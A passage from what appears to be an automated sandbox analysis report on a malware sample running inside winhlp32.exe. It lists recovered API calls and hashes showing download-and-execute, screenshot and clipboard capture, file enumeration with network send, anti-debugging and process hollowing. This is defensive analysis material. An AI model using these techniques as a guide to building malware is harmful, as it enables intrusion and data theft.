                                    • Opcode ID: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                                    • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                    • Opcode Fuzzy Hash: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                                    • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DownloadExecuteFileShell
                                    • String ID: C:\Windows\winhlp32.exe$open
                                    • API String ID: 2825088817-987339790
                                    • Opcode ID: 0c32b853da7b836ab57f0bde1af97ed3e1694aa48b330bda9084993edcb846bb
                                    • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                    • Opcode Fuzzy Hash: 0c32b853da7b836ab57f0bde1af97ed3e1694aa48b330bda9084993edcb846bb
                                    • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$FirstNextsend
                                    • String ID: XPG$XPG
                                    • API String ID: 4113138495-1962359302
                                    • Opcode ID: e29027b1129f5de26fe31c102a0591a663b67a3d85defad3f43bd9c530b36695
                                    • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                    • Opcode Fuzzy Hash: e29027b1129f5de26fe31c102a0591a663b67a3d85defad3f43bd9c530b36695
                                    • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                      • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                      • Part of subcall function 0041376F: RegSetValueExA.KERNELBASE(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
                                      • Part of subcall function 0041376F: RegCloseKey.KERNELBASE(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateInfoParametersSystemValue
                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                    • API String ID: 4127273184-3576401099
                                    • Opcode ID: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                                    • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                    • Opcode Fuzzy Hash: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                                    • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorInfoLastLocale$_free$_abort
                                    • String ID:
                                    • API String ID: 2829624132-0
                                    • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                    • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                    • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                    • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                    • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                    • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                    • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00000000), ref: 00433849
                                    • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Context$AcquireRandomRelease
                                    • String ID:
                                    • API String ID: 1815803762-0
                                    • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                    • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                    • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                    • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                                    • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                                    • ExitProcess.KERNEL32 ref: 004432EF
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                    • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                    • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                    • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenClipboard.USER32(00000000), ref: 0040B711
                                    • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                    • CloseClipboard.USER32 ref: 0040B725
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$CloseDataOpen
                                    • String ID:
                                    • API String ID: 2058664381-0
                                    • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                    • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                    • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                    • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .
                                    • API String ID: 0-248832578
                                    • Opcode ID: 467a2b870f27eeaba5f3d85303d6c443c91537f9433fd9512f86f3d9895b4a39
                                    • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                    • Opcode Fuzzy Hash: 467a2b870f27eeaba5f3d85303d6c443c91537f9433fd9512f86f3d9895b4a39
                                    • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID: lJD
                                    • API String ID: 1084509184-3316369744
                                    • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                    • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                    • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                    • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID: lJD
                                    • API String ID: 1084509184-3316369744
                                    • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                    • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                    • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                    • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: GetLocaleInfoEx
                                    • API String ID: 2299586839-2904428671
                                    • Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                    • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                    • Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                    • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: 9f2d401c641a2cfb93471127350fb786a64fc0260f1ce6cfe78b140b0d52c749
                                    • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                                    • Opcode Fuzzy Hash: 9f2d401c641a2cfb93471127350fb786a64fc0260f1ce6cfe78b140b0d52c749
                                    • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FeaturePresentProcessor
                                    • String ID:
                                    • API String ID: 2325560087-0
                                    • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                    • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                    • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                    • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free$InfoLocale_abort
                                    • String ID:
                                    • API String ID: 1663032902-0
                                    • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                    • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                    • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                    • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$InfoLocale_abort_free
                                    • String ID:
                                    • API String ID: 2692324296-0
                                    • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                    • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                    • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                    • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                    • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                    • String ID:
                                    • API String ID: 1272433827-0
                                    • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                    • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                    • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                    • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID:
                                    • API String ID: 1084509184-0
                                    • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                    • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                    • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                    • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                    • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                    • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                    • Instruction Fuzzy Hash:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                    • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                      • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                    • DeleteDC.GDI32(00000000), ref: 00418F2A
                                    • DeleteDC.GDI32(00000000), ref: 00418F2D
                                    • DeleteObject.GDI32(00000000), ref: 00418F30
                                    • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                    • DeleteDC.GDI32(00000000), ref: 00418F62
                                    • DeleteDC.GDI32(00000000), ref: 00418F65
                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                    • GetIconInfo.USER32(?,?), ref: 00418FBD
                                    • DeleteObject.GDI32(?), ref: 00418FEC
                                    • DeleteObject.GDI32(?), ref: 00418FF9
                                    • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                    • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                    • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                    • DeleteDC.GDI32(?), ref: 0041917C
                                    • DeleteDC.GDI32(00000000), ref: 0041917F
                                    • DeleteObject.GDI32(00000000), ref: 00419182
                                    • GlobalFree.KERNEL32(?), ref: 0041918D
                                    • DeleteObject.GDI32(00000000), ref: 00419241
                                    • GlobalFree.KERNEL32(?), ref: 00419248
                                    • DeleteDC.GDI32(?), ref: 00419258
                                    • DeleteDC.GDI32(00000000), ref: 00419263
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                    • String ID: DISPLAY
                                    • API String ID: 479521175-865373369
                                    • Opcode ID: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                    • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                    • Opcode Fuzzy Hash: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                    • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                    • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
